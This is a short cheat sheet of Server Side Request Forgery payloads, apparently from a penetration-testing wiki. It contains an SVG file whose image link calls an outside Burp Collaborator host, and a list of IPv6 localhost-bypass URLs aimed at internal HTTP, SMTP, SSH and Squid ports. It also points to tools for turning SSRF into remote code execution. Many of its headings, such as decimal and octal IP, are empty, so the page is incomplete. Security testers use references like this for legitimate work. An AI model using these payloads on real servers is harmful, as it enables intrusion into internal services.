Server Side Request Forgery (SSRF)

Payloads

SSRF in SVG file

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200">
    <image height="200" width="200" xlink:href="http://burpcollaborator.com/image.jpeg" />
</svg>

Localhost Bypasses

Using [::]

http://[::]:80/ #HTTP
http://[::]:25/ #SMTP 
http://[::]:22/ #SSH
http://[::]:3128/ #SQUID
http://0000::1:80/ #HTTP
http://0000::1:25/ #SMTP
http://0000::1:22/ #SSH
http://0000::1:3128/ #SQUID

Using a domain redirection

Using CIDR

Using decimal IP location

Using Octal IP

Using IPv6/IPv4 Address Embedding

Using malformed urls

Using weird address

Using enclosed alphanumerics

Against a weak parser

References

Gopherus - Tool to generate gopher link for exploiting SSRF and gaining RCE in various servers
lorsrf - SSRF parameter bruteforce (use scant3r module instead)
SSRF Payloads Repository

Last updated